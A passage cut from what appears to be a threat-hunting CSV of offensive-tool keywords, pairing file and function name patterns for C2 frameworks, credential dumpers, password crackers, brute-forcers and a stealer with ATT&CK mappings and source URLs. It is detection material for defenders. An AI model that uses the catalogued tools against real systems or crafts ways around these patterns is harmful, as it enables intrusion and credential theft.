TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*WMIReg.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*wmispawn select*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*WmiSploit.git*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*WmiSploit-master/zip*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*WNFarmDynamite_h.cs*,offensive_tool_keyword,WindfarmDynamite,WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread),T1055.013 - T1546.008,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*word_gen_b_varlen.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*word_unc_injector.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Wordlist/ftp_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ftp_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ftp_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/mssql_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/mysql_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/oracle_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/pass.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/pop_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/pop_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/postgres_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/smtp_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/smtp_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/snmp.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/sql_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/sql_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ssh_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ssh_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ssh_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/telnet_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/telnet_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/telnet_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/user.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/vnc_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/windows_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/windows_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*wordlist_TLAs.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--wordlist=*-passwords.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*wordlist-nthash-reversed*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*wordlist-probable.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wordlists*rmg.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*wordlists*rmiscout.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*wordlists/dynamic-all.txt*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*wordlists/fasttrack.txt*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*wordlists/rockyou.txt'*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*wordlists/subdomains-5000.txt*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*wordlists/top1million.txt*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*WorldWind Stealer.zip*,offensive_tool_keyword,WorldWind-Stealer,WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram,T1114.002 - T1071.001 - T1552.002,TA0011 - TA0005 - TA0040,N/A,N/A,malware,https://github.com/Leecher21/WorldWind-Stealer,1,1,N/A,10,1,11,3,2023-03-25T09:54:01Z,2023-02-07T11:44:42Z -*WorldWind-Stealer*,offensive_tool_keyword,WorldWind-Stealer,WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram,T1114.002 - T1071.001 - T1552.002,TA0011 - TA0005 - TA0040,N/A,N/A,malware,https://github.com/Leecher21/WorldWind-Stealer,1,1,N/A,10,1,11,3,2023-03-25T09:54:01Z,2023-02-07T11:44:42Z -*wpapcap2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*wp-exploitable-plugins.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wpscan --api-token *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*WPScan*,offensive_tool_keyword,WPScan,WPScan is a black box WordPress vulnerability scanner.,T1190 - T1210.001 - T1195,TA0007 - TA0010 - ,N/A,N/A,Web Attacks,https://github.com/wpscanteam/wpscan,1,1,N/A,N/A,10,7829,1230,2023-10-02T10:48:40Z,2012-07-11T20:27:47Z -*wrap_execute_assembly*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_execute_encoded_powershell*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_get_clipboard*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_inject_shellc*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_load_memfd*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_unhook_ntdll*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*write_cs_teamserver*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*write_payload_dll_transacted*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*write_what_where.py*,offensive_tool_keyword,POC,POC to check for CVE-2020-0796 / SMBGhost,T1210.001 - T1213 - T1212 - T1201,TA0007 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ZecOps/CVE-2020-0796-LPE-POC,1,1,N/A,N/A,3,242,90,2020-04-02T08:01:38Z,2020-03-30T16:06:50Z -*WriteAndExecuteShellcode*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*WriteDLLPermission.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Write-HijackDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Write-HijackDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Write-HijackDll*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Write-Output 127.0.0.1:1111*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*WritePayloadDllTransacted*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 